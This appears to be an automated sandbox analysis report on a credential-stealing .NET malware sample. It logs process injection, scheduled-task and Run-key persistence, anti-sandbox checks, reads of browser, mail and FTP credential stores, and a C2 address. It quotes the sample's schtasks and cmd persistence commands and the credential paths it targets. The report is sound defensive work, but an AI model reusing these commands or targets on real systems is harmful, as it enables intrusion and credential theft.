                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2188:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4224:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4660:120:WilError_01
                  Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_01
                  Source: 2.0.vbc.exe.400000.0.unpack, A/F1.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                  Source: Window Recorder | Window detected: More than 3 window changes detected
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: pdP5Rv9pPW.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: pdP5Rv9pPW.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: vbc.pdb | source: vbc.exe, 00000002.00000003.370543337.000000000A09D000.00000004.00000800.00020000.00000000.sdmp, excel.exe, 0000000C.00000000.391226032.0000000001261000.00000020.00000001.01000000.00000007.sdmp, excel.exe.2.dr

                  Data Obfuscation

                  Source: pdP5Rv9pPW.exe, 00000000.00000000.301051021.0000000000192000.00000020.00000001.01000000.00000003.sdmp | String found in binary or memory: dotNetProtector
                  Source: pdP5Rv9pPW.exe, 00000000.00000000.301051021.0000000000192000.00000020.00000001.01000000.00000003.sdmpString found in binary or memory: 3H@rM_2BytesPerCharDirectorySeparatorCharRemoveMemberMagicNumber_haveReadFromReaderInternalFormatProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderIEEERemainderBufferResourceManagerDebuggerCheckHelperModuleRefUserKeepDelimiterGet_CreatePdbSymbolWriterCreateSymWriterget_IsPointerBitConverterKeyValuePairGetTokenForFloorGet_PercentGroupSeparatorTextElementEnumerator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorCodePageDataPtrIntPtrM_iCAsAbsSystem.Diagnosticsgsadshdsget_PreservePropertyRidsFadsssfhcfggddsgsdfgfgggfggggggggilggEndsFadsssfhcfddgdgsgsdfgfgggfggggggggilggEndsGetMethodsadsdsAesSystemEnterpriseServicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcespFljoFmnmndkleo.resourcesGetDirectoriesabbreviatedMonthNamesDayNamesSaShortTimesM_iEndLinesInlineeLinesGetExportedTypesCompareDeclaringTypesGregorianCalendarTypesMemberTypesStartOfUserTypesEmptyTypesGetCatchEndAddressesMethodAttributesSetFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesRfc2898DeriveBytesGetBytesfhfsGet_BindingFlagsGetMethodImplementationFlagsSetImplementationFlagsjfddggsshgsfhddsdshfddfhhsagshsSet_HasThisGet_MethodBodyChunksEqualsContainsCallingConventionsm_OptionsCreationOptionsCosGetCustomAttributePropsGetMemberRefPropsget_CharsGetMembersGetOptionalCustomModifiersGet_ExceptionHandlersReadExceptionHandlersRuntimeHelpersGetParametersGet_TotalHoursget_IsClassAssemblyBuilderAccessM_accessGetCurrentProcessSsucggsshhhdassdasgggggggggdddddddddddfccgdfsdefssSsucggsshhhdassdassssssssgggggggggdddddddddddfccgdfsdefssSsucggsshhdhgdddddddggggggggggggsddddfccggdfsdefssgfssGetGenericArgumentsExistsModulus l
                  Source: pdP5Rv9pPW.exe | String found in binary or memory: dotNetProtector
                  Source: pdP5Rv9pPW.exeString found in binary or memory: 3H@rM_2BytesPerCharDirectorySeparatorCharRemoveMemberMagicNumber_haveReadFromReaderInternalFormatProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderIEEERemainderBufferResourceManagerDebuggerCheckHelperModuleRefUserKeepDelimiterGet_CreatePdbSymbolWriterCreateSymWriterget_IsPointerBitConverterKeyValuePairGetTokenForFloorGet_PercentGroupSeparatorTextElementEnumerator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorCodePageDataPtrIntPtrM_iCAsAbsSystem.Diagnosticsgsadshdsget_PreservePropertyRidsFadsssfhcfggddsgsdfgfgggfggggggggilggEndsFadsssfhcfddgdgsgsdfgfgggfggggggggilggEndsGetMethodsadsdsAesSystemEnterpriseServicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcespFljoFmnmndkleo.resourcesGetDirectoriesabbreviatedMonthNamesDayNamesSaShortTimesM_iEndLinesInlineeLinesGetExportedTypesCompareDeclaringTypesGregorianCalendarTypesMemberTypesStartOfUserTypesEmptyTypesGetCatchEndAddressesMethodAttributesSetFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesRfc2898DeriveBytesGetBytesfhfsGet_BindingFlagsGetMethodImplementationFlagsSetImplementationFlagsjfddggsshgsfhddsdshfddfhhsagshsSet_HasThisGet_MethodBodyChunksEqualsContainsCallingConventionsm_OptionsCreationOptionsCosGetCustomAttributePropsGetMemberRefPropsget_CharsGetMembersGetOptionalCustomModifiersGet_ExceptionHandlersReadExceptionHandlersRuntimeHelpersGetParametersGet_TotalHoursget_IsClassAssemblyBuilderAccessM_accessGetCurrentProcessSsucggsshhhdassdasgggggggggdddddddddddfccgdfsdefssSsucggsshhhdassdassssssssgggggggggdddddddddddfccgdfsdefssSsucggsshhdhgdddddddggggggggggggsddddfccggdfsdefssgfssGetGenericArgumentsExistsModulus l
                  Source: fghn.exe.9.dr | String found in binary or memory: dotNetProtector
                  Source: fghn.exe.9.drString found in binary or memory: 3H@rM_2BytesPerCharDirectorySeparatorCharRemoveMemberMagicNumber_haveReadFromReaderInternalFormatProviderMethodBuilderModuleBuilderTypeBuilderAssemblyBuilderSpecialFolderIEEERemainderBufferResourceManagerDebuggerCheckHelperModuleRefUserKeepDelimiterGet_CreatePdbSymbolWriterCreateSymWriterget_IsPointerBitConverterKeyValuePairGetTokenForFloorGet_PercentGroupSeparatorTextElementEnumerator.ctor.cctordotNetProtectorget_IsConstructorCreateDecryptorCodePageDataPtrIntPtrM_iCAsAbsSystem.Diagnosticsgsadshdsget_PreservePropertyRidsFadsssfhcfggddsgsdfgfgggfggggggggilggEndsFadsssfhcfddgdgsgsdfgfgggfggggggggilggEndsGetMethodsadsdsAesSystemEnterpriseServicesSystem.Runtime.InteropServicesSystem.Runtime.CompilerServicesSystem.ResourcespFljoFmnmndkleo.resourcesGetDirectoriesabbreviatedMonthNamesDayNamesSaShortTimesM_iEndLinesInlineeLinesGetExportedTypesCompareDeclaringTypesGregorianCalendarTypesMemberTypesStartOfUserTypesEmptyTypesGetCatchEndAddressesMethodAttributesSetFileAttributesTypeAttributesMethodImplAttributesGetCustomAttributesRfc2898DeriveBytesGetBytesfhfsGet_BindingFlagsGetMethodImplementationFlagsSetImplementationFlagsjfddggsshgsfhddsdshfddfhhsagshsSet_HasThisGet_MethodBodyChunksEqualsContainsCallingConventionsm_OptionsCreationOptionsCosGetCustomAttributePropsGetMemberRefPropsget_CharsGetMembersGetOptionalCustomModifiersGet_ExceptionHandlersReadExceptionHandlersRuntimeHelpersGetParametersGet_TotalHoursget_IsClassAssemblyBuilderAccessM_accessGetCurrentProcessSsucggsshhhdassdasgggggggggdddddddddddfccgdfsdefssSsucggsshhhdassdassssssssgggggggggdddddddddddfccgdfsdefssSsucggsshhdhgdddddddggggggggggggsddddfccggdfsdefssgfssGetGenericArgumentsExistsModulus l
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04EB5CF0 push ebx; retf 0_2_04EBA826
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04EB4C5D push esp; ret 0_2_04EB4C5E
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04EB4D2D push cs; retf 0_2_04EB4D4A
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04ECA4FE push edx; retf 0040h 0_2_04ECA57E
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04ECA9DE pushad ; ret 0_2_04ECAA1D
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04EC0E89 push ebp; ret 0_2_04EC0E8C
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04EDBC8F pushfd ; ret 0_2_04EDBC8E
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04EDB896 push ds; iretd 0_2_04EDB9AA
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04EDBC5E pushfd ; ret 0_2_04EDBC8E
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04EDB829 push ds; iretd 0_2_04EDB9AA
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04EDB813 push ds; iretd 0_2_04EDB9AA
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04F00EC0 push ds; ret 0_2_04F00EC3
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Code function: 0_2_04F00287 push edi; iretd 0_2_04F0028A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_09EE8860 push 8C09138Ch; retf 04F7h 2_2_09EE9C3D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_09EE9800 push 8C09138Ch; retf 04F7h 2_2_09EE9C3D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_0A27122D push esp; iretd 2_2_0A27122E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_0A271397 pushad ; iretd 2_2_0A271398
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_0A2713EA push esp; iretd 2_2_0A2713EB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_0A27102B push esp; iretd 2_2_0A27102C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_0A272520 push edi; ret 2_2_0A272526
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_0A272177 push edi; retn 0000h 2_2_0A272179
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_0A2715E5 pushfd ; iretd 2_2_0A2715E6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_0A2725DD push E904F7D0h; retn 0006h 2_2_0A2725E2
                  Source: C:\Windows\SysWOW64\cmd.exe | File created: C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File created: C:\Users\user\AppData\Roaming\excel\excel.exe

                  Boot Survival

                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run excel

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Roaming\excel\excel.exe:Zone.Identifier read attributes | delete
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Process information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe TID: 5840 | Thread sleep count: 41 > 30
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe TID: 5840 | Thread sleep time: -41000s >= -30000s
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe TID: 5748 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5232 | Thread sleep time: -7378697629483816s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5932 | Thread sleep count: 9658 > 30
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe TID: 2620 | Thread sleep count: 44 > 30
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe TID: 2620 | Thread sleep time: -44000s >= -30000s
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe TID: 5828 | Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 1680 | Thread sleep time: -6456360425798339s >= -30000s
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe TID: 5704 | Thread sleep count: 9690 > 30
                  Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Window / User API: threadDelayed 9658
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Window / User API: threadDelayed 9690
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Process information queried: ProcessInformation
                  Source: vbc.exe, 00000002.00000003.391294158.0000000009F3A000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.394371318.0000000009F4C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.593748188.000000000A5E2000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process token adjusted: Debug
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process queried: DebugPort
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_0A3F3AC0 LdrInitializeThunk,2_2_0A3F3AC0
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Roaming\excel\excel.exe | Injected file: C:\Users\user\AppData\Roaming\excel\excel.exe was created by C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 436000
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 438000
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 7BD008
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 402000
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 436000
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 438000
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 5132008
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\Desktop\pdP5Rv9pPW.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c mkdir "C:\Users\user\AppData\Roaming\fghn
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\SysWOW64\cmd.exe "cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Process created: C:\Windows\SysWOW64\cmd.exe cmd" /c copy "C:\Users\user\AppData\Roaming\fghn\fghn.exe" "C:\Users\user\AppData\Roaming\fghn\fghn.exe
                  Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\user\AppData\Roaming\fghn\fghn.exe'" /f
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Queries volume information: C:\Users\user\Desktop\pdP5Rv9pPW.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\AppData\Roaming\fghn\fghn.exe | Queries volume information: C:\Users\user\AppData\Roaming\fghn\fghn.exe VolumeInformation
                  Source: C:\Users\user\Desktop\pdP5Rv9pPW.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Code function: 2_2_09EE4ECC GetUserNameW,2_2_09EE4ECC

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                  Source: Yara match | File source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match | File source: 2.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.3996170.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.39ca790.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.39ca790.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 0.2.pdP5Rv9pPW.exe.3996170.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000000.363305097.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000000.00000002.380144248.0000000003991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000002.00000002.537927671.0000000006AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000017.00000002.585255160.000000000721C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: pdP5Rv9pPW.exe PID: 5704, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 5224, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: vbc.exe PID: 1608, type: MEMORYSTR

                  MITRE ATT&CK Matrix

                  Techniques flagged for this sample, by tactic; the number in parentheses is the badge value shown in the matrix cell.

                  Initial Access: Valid Accounts (1)
                  Execution: Windows Management Instrumentation (211); Shared Modules (1); Exploitation for Client Execution (1); Scheduled Task/Job (1)
                  Persistence: Valid Accounts (1); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1)
                  Privilege Escalation: Valid Accounts (1); Access Token Manipulation (1); Process Injection (311); Scheduled Task/Job (1); Registry Run Keys / Startup Folder (1)
                  Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (11); Obfuscated Files or Information (21); Software Packing (1); Masquerading (1); Valid Accounts (1); Access Token Manipulation (1); Virtualization/Sandbox Evasion (141); Process Injection (311); Hidden Files and Directories (1)
                  Credential Access: OS Credential Dumping (2); Input Capture (11); Credentials in Registry (1)
                  Discovery: Account Discovery (1); System Information Discovery (114); Security Software Discovery (221); Process Discovery (1); Virtualization/Sandbox Evasion (141); Application Window Discovery (1); System Owner/User Discovery (1)
                  Lateral Movement: no technique flagged
                  Collection: Archive Collected Data (11); Data from Local System (2); Email Collection (1); Input Capture (11); Clipboard Data (1)
                  Exfiltration: no technique flagged
                  Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (1); Application Layer Protocol (11)
                  Network Effects, Remote Service Effects, Impact: no technique flagged

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph (ID 691823). Sample: pdP5Rv9pPW.exe. Start date: 28/08/2022. Architecture: WINDOWS. Score: 100.
                  Top-level signatures (start node 2): Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); 6 other signatures.

                  Process tree (graph node id, image, the graph's per-process counters in parentheses; dropped files, network contacts and signatures listed under each node):
                  2 start
                    7 pdP5Rv9pPW.exe (4)
                        dropped: C:\Users\user\AppData\...\pdP5Rv9pPW.exe.log (ASCII)
                        signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                        17 vbc.exe (17, 4)
                            network: 141.98.6.75 (local ports 49717, 49753; destination port 80; CMCSUS, Germany)
                            dropped: C:\Users\user\AppData\Roaming\...\excel.exe (PE32)
                            signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Tries to steal Mail credentials (via file / registry access); 4 other signatures
                        22 cmd.exe (3)
